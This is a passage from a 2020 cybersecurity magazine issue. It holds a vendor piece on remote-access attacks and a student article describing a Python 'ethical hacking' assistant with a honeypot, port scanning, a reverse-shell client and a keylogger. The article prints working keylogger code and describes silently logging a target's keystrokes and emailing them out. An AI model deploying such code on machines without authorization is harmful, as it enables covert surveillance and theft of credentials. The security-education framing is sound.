Officer, as well as Deputy Director of the Department of Defense/VA Interagency Program Office. Before 

joining the VA, Stan served as Chief Information Officer of the Federal Trade Commission. Stan’s public 

service record extends to the U.S. Department of Interior in the Bureau, the U.S. Postal Service Inspector 

General, and the U.S. Navy. 

Stan has also served as an executive in several technology startups, and currently serves on several 

boards advising on cybersecurity. He is a frequent speaker and writer on security topics. 



CERT Warns Bad Actors Are Targeting Remote 

Access – How Security Operations Find And Route These 

“Below The Radar” Attacks 

New Ransomware/Exfiltration Campaign Targeting Remote Access Resists Resolution Through Data 

Restoration 

By Saryu Nayyar, CEO, Gurucul 

Remote access tools, such as VPN’s, RDP, VNC, Citrix, and others, have always been an inviting target 

for attackers. Even 2003’s Matrix Reloaded used an exploit against an old version of Secure Shell (SSH) 

as a plot device in a rare cinematic example of a real-world cyber-security threat. The recent shift to a 

remote workforce in response to a global pandemic has made remote access an even more inviting target 

for threat actors of all stripes. 

As a recent report from New Zealand’s CERT pointed out, malicious actors are actively focusing on 

remote access vectors, using a range of attack techniques. While unpatched systems are an ongoing 

issue, attackers are also targeting weak authentication schemes, including a notable lack of two-factor 

authentication. The users themselves are also a primary target. Targeted email such as spear phishing, 

which goes for a specific target, or cast-netting, that targets people within a single organization, have a 

history of success and have seen a noticeable rise. 

Fortunately, information security professionals still have a range of tools and techniques they can use to 

help prevent breaches and to mitigate them when they do happen. 

Many attack scenarios, especially ones involving remote access attacks, start with targeting the users 

themselves. Many penetration testers will tell you the users are the easiest target and the first thing 

they’ll go after. But this also gives an organization the opportunity to convert their user base from part of 

the attack surface into their first line of defense. Making sure you have trained them on best practices 

and have enabled a strong multi-factor authentication scheme can go a long way to preventing 

unauthorized access. 



For many organizations, the Security Operations team, rather than their users, is the main line of 

defense. Even when the services are provided whole, or in part, by a third party, they are the ones who 

have the ultimate responsibility for the organization’s security well-being. Which means assuring they 

have the correct tools and the right training is as important as making sure the users are trained and 

equipped. The question becomes whether they have the right tools and training to identify and mitigate 

attack profiles that have now shifted to target the remote workforce. 

The threats they have been historically focused on have not disappeared, but they may no longer be the 

primary attack surface. Likewise, the tools they use to identify and mitigate attacks may not be the best 

ones now that the attacker’s focus has shifted. 

Threat actors have become increasingly skilled at compromising systems and then hiding their activity 

“below the radar” to avoid detection, which makes their activity harder to detect. More so now that they 

have a remote workforce to both target for attack and use for concealment. That means the SecOps 

team will need to look at the situation holistically rather than relying on single indicators of compromise. 

To that end, an advanced security analytics platform that can consolidate all the organization’s security 

data into a single place and then perform AI-based analytics the entirety of the data may be in order. By 

looking at all the information, it is possible to identify anomalous behavior that differs subtly from what’s 

expected, or accepted, for a normal user. That can be the first indication of a compromise. Using 

machine learning techniques, the system can adapt to the changing threat surface and present a riskbased 

assessment to the SecOps team. 

Combined with their existing tools and efficient automation, security operations personnel can get ahead 

of an attack to keep a single compromised account or remote access system from escalating to a serious 

data breach. 


Saryu Nayyar is the CEO of Gurucul. She is an internationally 

recognized cybersecurity expert, author and speaker with more 

than 15 years of experience in the information security, identity 

and access management, IT risk and compliance, and security 

risk management sectors. She was named EY Entrepreneurial 

Winning Women in 2017. She has held leadership roles in 

security products and services strategy at Oracle, Simeio, Sun 

Microsystems, Vaau (acquired by Sun) and Disney, and held 

senior positions in the technology security and risk management practice of Ernst & Young. She is 

passionate about building disruptive technologies and has several patents pending for behavior analytics, 

anomaly detection and dynamic risk scoring inventions. 

Saryu can be reached on Twitter at @Gurucul 



CRYPTO 

An Amalgamation of Cyber Defense and Ethical Hacking Mechanisms 

By Staford Titus S 

Prelude 

Security on its own is a misnomer in this technological and (for the most part) cybernated era. Cyber- 

Security has emerged as a crucial factor in protecting almost every, or atleast the online aspect of human 

lives. The preponderance of electronic devices used are computers, including mobile phones, Smart TVs 

and even smart watches, all of which contain personal or business data. Cybercrimes take place 

ubiquitously, wrecking havoc by causing loss and sometimes even misuse of these information. 

According to RiskIQ’s 2019 Evil Internet Minute, cybercrimes cost around $2.9 million dollars to the global 

economy every minute. This invokes the necessity to secure data, to prevent it from being stolen or 

compromised. It is thus, unerring to assume that cybercrimes are imminent, and hence, preventive 

countermeasures are required to be set in place to sail above these turbulent waves of cyber-attacks. 

Centralizing this theme, initialised the development of Crypto. The idea involves developing an AI 

assistant that is capable of implementing secure policies using built-in security tools and also aid in ethical 

hacking operations. For those of you, for whom, on reading the word AI, nightmares of AI world 

domination are imminent: 



Fig 1: AI Meme 

This article documents the several security and hacking methodologies infrastructured in Crypto. A good 

number of security policies and frameworks have been implemented to help secure the systems. 

The Root 

The developmental strategies involved are loosely adhered to and inspired by the control 

strategies/countermeasures discussed by one, Charles P. Pfleeger in the book “Security in Computing”. 

According to Fig 2 we can deal with cyber attacks in the following ways: 

1. prevent it, by blocking the attack or closing the vulnerability 

2. deter it, by making the attack harder but not impossible 

3. deflect it, by making another target more attractive (or this one less so) 

4. mitigate it, by making its impact less severe 

5. detect it, either as it happens or some time after the fact 

6. recover from its effects 

“Prevention is better than cure!” Ensuing that statement is what is aimed to be accomplished, since it’s 

always better to prevent an attack, than building back upon its wreckage. The aforementioned strategies 

are implemented in several different ways, of which, an example is the Intrusion Detection System, that 

helps detect anomalies and intrusions and direct it to honeypots or isolated networks, in turn incorporating 

a pooled approach of the control strategies. 



Fig 2: Control Strategies from the book “Security in Computing” 

Under the Hood and UI 

Built with primary intentions to implement security mechanisms and countermeasures along with hackeraiding 

tools, fueling Crypto’s underlying architecture is good old Python. Python was considered over 

other programming languages due to the sheer size of the open-source libraries and packages that it 

offers. Eel was introduced in the infrastructure to establish undeterred connection between the frontend 

and backend functions/mechanisms. Eel is a little Python library for making simple Electron-like offline 

HTML/JS GUI apps. Eel offered so much more than it promised which helped incorporate several features 

which previously couldn’t be fused. Implementing Eel is as simple as adding an “@eel.expose” line before 

a function in python. Contemplating over the versatility as well as user-friendliness and also considering 

the various design milestones that could be reached using HTML and CSS, the offering is not a CLI tool 

but has a natty looking GUI. Centre-Bottom is the user input, Top-Middle is the chat box, Bottom-Left is 

the news tab, Bottom-Right is the console, that displays all of the console logs and messages and Top- 

Right is the Date & Time and weather data. Top-Left is reserved for popup menus. The next few sections 

elucidate the several security and hacking mechanisms implemented in the project module. 



Fig 3: Screengrab of Crypto’s UI 

Security Mechanisms 

Honeypot 

Luring an unsuspicious attacker into a trap is the singular mechanism that a Honeypot implements. 

According to wikipedia, a honeypot is a computer security mechanism set to detect, deflect, or, in some 

manner, counteract attempts at unauthorized use of information systems. Creation of honeypot on any 

port belies it as a decoy enticing to the attackers, thus enabling prevention or at least deceleration of 

attacks to the main system. Logging the honeypot environment for any of the activities performed by 

attackers mistaking the honeypot for a real loophole is also implemented to enhance the security policy. 

The logs can be sent to the users’ mail or even stored on remote servers such as graylog for future 

pattern analysis. Below is a code sample of the honeypot: 

@eel.expose 

def honeypot(): 

LHOST = '0.0.0.0' 

LPORT = 1024 

RHOST = '192.168.29.203' 

RPORT = 9000 

BANNER = '220 ProFTPD 1.2.8 Server\nName: ' 



TIMEOUT = 10 

listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 

def hon(): 

print ('[*] Honeypot starting on ' + LHOST + ':' + str(LPORT)) 

eel.test('[*] Honeypot starting on ' + LHOST + ':' + str(LPORT)) 

atexit.register(exit_handler) 

listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 

listener.bind((LHOST, LPORT)) 

listener.listen(5) 

while True: 

(insock, address) = listener.accept() 

insock.settimeout(TIMEOUT) 

print ('[*] Honeypot connection from ' + address[0] + ':' + str(address[1]) + ' on port ' + str(LPORT)) 

eel.test('[*] Honeypot connection from ' + address[0] + ':' + str(address[1]) + ' on port ' + 

str(LPORT)) 

try: 

insock.send(BANNER.encode()) 

data = insock.recv(1024) 

except socket.error as e: 

sendLog(address[0],'Error: ' + str(e)) 

else: 

sendLog(address[0],data) 

finally: 

insock.close() 



hon() 

Fig 4: Screengrab of Honeypot in Action 

Intrusion Detection System 

Intrusion Detection is a particularly, very important mechanism to implement, since detecting an anomaly 

or intrusion is the fundamental step in protecting a system. It is based on strategies involved in applying 

round-the clock detection and scanning. The IDS is created as a virtual network using mininets which 

serve as honeypot hosts that continually monitor the traffic flowing in and out of the network for anomalies. 

If an anomaly or outlier is detected, then an email is sent to the user of the same, and fake SYN packets 

are sent for the attackers to connect to a virtualized and isolated mininet network. This mechanism is still 

under rudimentary development and testing owing to the length and breadth of operations and functions 

it aims to deliver. 

Parser Differential 

This mechanism is implemented inorder to cripple the various elf executable decompilers out there. 

Hence, the given c program code is run through an algorithm to make it unreadable by the decompilers 

such as radare2 or even gdb. This mechanism is highly influenced by LiveOverflow’s Reversing series. 

Hence cracking programs to find license keys get much harder. This parser differential module allows 

the user to upload C programs that they want to scramble and hence prevent cracking. The underlying 

algorithm is quite simple but extremely effective. Only one random byte within the code is scrambled so 

that it renders the whole code unreadable to decompilers but not to the Linux terminal. Hence the code 

can be executed but not decompiled. 

Facial Recognition 

Facial Recognition is a Biometric Artificial Intelligence based algorithm that can uniquely identify a person 

by analyzing patterns based on the person's facial textures and shape. Facial Recognition has been 



implemented based on the javascript face recognition library using Haar-Cascades. Hence, this 

implementation enhances the security disabling misuse of the features by strangers or unknown 

individuals. 

Hacking Mechanisms 

Port Scanning 

Reconnaissance is the first step to any hacking activity, since it is highly important to analyze the intended 

target on an intricate, or at the least, a basic level. Port scanning is one such pre-enumeration method 

used to identify open ports and services available on a network host. It could also be considered as a security mechanism, 

since from the countermeasures defined above, it is a method of detection/prevention. It can be performed for detection of 

open ports within any network, enabling admins to close or secure unused or time-constrained ports. Hackers, on the other 

hand, can use port scanning to identify the open ports through which they can access the network to perform ping attacks or 

smurf attacks at the least. Implementation of this mechanism requires the python nmap module that supports various types 

of scans.Fig 5 depicts the port scanning process. 

Fig 5: Port Scanning demonstration 

Reverse Shell 

Gaining access to target systems could be a pain, hence, Reverse Shells have been integrated to provide 

substantial aid in enumeration and forensic analysis. For this, a client side package is provided, which 

when run on the target machine, would in turn activate the reverse shell, establishing connection by 

binding sockets over ports. Once the reverse shell is active, users can type in unix commands to access 

the data and such on the target machine. It also enables users to download or upload files over ftp 

connections. 

Keylogger 

The keylogger is another great tool which can be used to log keystrokes. Users are provided with a client 

package which will run in the background on the target machine and will be able to record keystrokes 



with high-precision and also send keylogger data to the user’s email. An example code snippet of the 

keylogger is as below: 

from pynput.keyboard import Listener 

def logger(key): 

letter = str(key) 

letter = letter.replace("'", "") 

if letter == 'Key.space': 

letter = ' ' 

if letter == 'Key.shift_r': 

letter = '' 

if letter == "Key.ctrl_l": 

letter = "" 

if letter == "Key.enter": 

letter = "\n" 

with open("log.txt", 'a') as f: 

f.write(letter) 

with Listener(on_press=logger) as l: 

l.join() 



Encode/Decode 

Any and every pentester or hacker would have, with no doubts, faced encoded data in their several 

hacking endeavours. Hence several of the most popular encoding/decoding schemes such as Base64, 

URL, Brainfuck, JS Obfuscation, etc have been implemented. Encryption using AES(Advanced 

Encryption Standard) is also provided as depicted in Fig 6. 

Fig 6: AES Encryption 

Auxiliary Features/Mechanisms 

The several auxiliary mechanisms intertwined are: 

● 

● 

● 

● 

● 

● 

● 

Captcha Breaker 

Strong Password Generator 

File Scanning 

Email Sender 

Time and Weather 

News 

AI you can converse with 

Conclusion 

At present, Cyber-crimes have emerged more dangerous than ever before, embodying menacing 

hackers from all around the globe. It is therefore, high-time that Cyber security is accommodated in the 

front seat, enabling us to fight back. The above documented approach of implementation of the security 

policies are but a small step in aiding Ethical Hackers. Hopefully, this article succeeded in portraying “a 

method” to embrace the countermeasures and security mechanisms. 



References 

“Security in Computing” by Charles P. Pfleeger. 

LiveOverflow on youtube or at www.liveoverflow.com 

Mininet : Rapid Prototyping for Software Networks 

Xavier A Larriva-Novo Mario Vega-Barbas “Evaluation of Cybersecurity Data Set Characteristics for Their 

Applicability to Neural Networks Algorithms Detecting Cybersecurity Anomalies” 01 January 2020 


I am a budding Ethical Hacker with a towering interest in the security 

field. I am currently pursuing my Bachelors in Computer Science 

and Engineering at Jaya Engineering College in Chennai, India. I 

have participated in several CTF competitions and completed 

several courses on pentesting. My interest in cyber-security was 

piqued by the length and breadth of its applications and the thrill 

involved in solving the challenges. Hence, to no one’s surprise, I am 

currently working on several vulnhub boxes and overthewire 

challenges. Anybody wanting to collaborate can connect on twitter 

(@stafordtitus) or linkedIn ( https://www.linkedin.com/in/stafordtitus-643638147/ 

). 

































Meet Our Publisher: Gary S. Miliefsky, CISSP, fmDHS 

“Amazing Keynote” 

“Best Speaker on the Hacking Stage” 

“Most Entertaining and Engaging” 

Gary has been keynoting cyber security events throughout the year. He’s also been a 

moderator, a panelist and has numerous upcoming events throughout the year. 

If you are looking for a cybersecurity expert who can make the difference from a nice event to 

a stellar conference, look no further email marketing@cyberdefensemagazine.com 



You asked, and it’s finally here…we’ve launched CyberDefense.TV 

At least a dozen exceptional interviews rolling out each month starting this summer… 

Market leaders, innovators, CEO hot seat interviews and much more. 

A new division of Cyber Defense Media Group and sister to Cyber Defense Magazine. 



Free Monthly Cyber Defense eMagazine Via Email 

Enjoy our monthly electronic editions of our Magazines for FREE. 

This magazine is by and for ethical information security professionals with a twist on innovative consumer 

products and privacy issues on top of best practices for IT security and Regulatory Compliance. Our 

mission is to share cutting edge knowledge, real world stories and independent lab reviews on the best 

ideas, products and services in the information technology industry. Our monthly Cyber Defense e- 

Magazines will also keep you up to speed on what’s happening in the cyber-crime and cyber warfare 

arena plus we’ll inform you as next generation and innovative technology vendors have news worthy of 

sharing with you – so enjoy. You get all of this for FREE, always, for our electronic editions. Click here 

to sign up today and within moments, you’ll receive your first email from us with an archive of our 

newsletters along with this month’s newsletter. 

By signing up, you’ll always be in the loop with CDM. 

Copyright (C) 2020, Cyber Defense Magazine, a division of CYBER DEFENSE MEDIA GROUP (STEVEN G. 

SAMUELS LLC. d/b/a) 276 Fifth Avenue, Suite 704, New York, NY 10001, Toll Free (USA): 1-833-844-9468 d/b/a 

CyberDefenseAwards.com, CyberDefenseMagazine.com, CyberDefenseNewswire.com, 

CyberDefenseProfessionals.com, CyberDefenseRadio.com and CyberDefenseTV.com, is a Limited Liability 

Corporation (LLC) originally incorporated in the United States of America. Our Tax ID (EIN) is: 45-4188465, 

Cyber Defense Magazine® is a registered trademark of Cyber Defense Media Group. EIN: 454-18-8465, DUNS# 

078358935. All rights reserved worldwide. marketing@cyberdefensemagazine.com 

All rights reserved worldwide. Copyright © 2020, Cyber Defense Magazine. All rights reserved. No part of this 

newsletter may be used or reproduced by any means, graphic, electronic, or mechanical, including photocopying, 

recording, taping or by any information storage retrieval system without the written permission of the publisher 

except in the case of brief quotations embodied in critical articles and reviews. Because of the dynamic nature of 

the Internet, any Web addresses or links contained in this newsletter may have changed since publication and may 

no longer be valid. The views expressed in this work are solely those of the author and do not necessarily reflect 

the views of the publisher, and the publisher hereby disclaims any responsibility for them. Send us great content 

and we’ll post it in the magazine for free, subject to editorial approval and layout. Email us at 



276 Fifth Avenue, Suite 704, New York, NY 1000 

EIN: 454-18-8465, DUNS# 078358935. 

All rights reserved worldwide. 


www.cyberdefensemagazine.com 

NEW YORK (US HQ), LONDON (UK/EU), HONG KONG (ASIA) 

Cyber Defense Magazine - Cyber Defense eMagazine rev. date: 07/01/2020 



TRILLIONS ARE AT STAKE 

No 1 INTERNATIONAL BESTSELLER IN FOUR CATEGORIES 

Released: 

https://www.amazon.com/Cryptoconomy-Bitcoins-Blockchains-Bad-Guys-ebook/dp/B07KPNS9NH 

In Development: 





8 Years in The Making… 

Thank You to our Loyal Subscribers! 

We've Completely Rebuilt CyberDefenseMagazine.com - Please Let Us Know 

What You Think. It's mobile and tablet friendly and superfast. We hope you 

like it. In addition, we're shooting for 7x24x365 uptime as we continue to 

scale with improved Web App Firewalls, Content Deliver Networks (CDNs) 

around the Globe, Faster and More Secure DNS 

and CyberDefenseMagazineBackup.com up and running as an array of live 

mirror sites. 

Millions of monthly readers and new platforms coming…

Cyber Defense eMagazine July 2020 Edition

Create successful ePaper yourself

Delete template?

Save as template?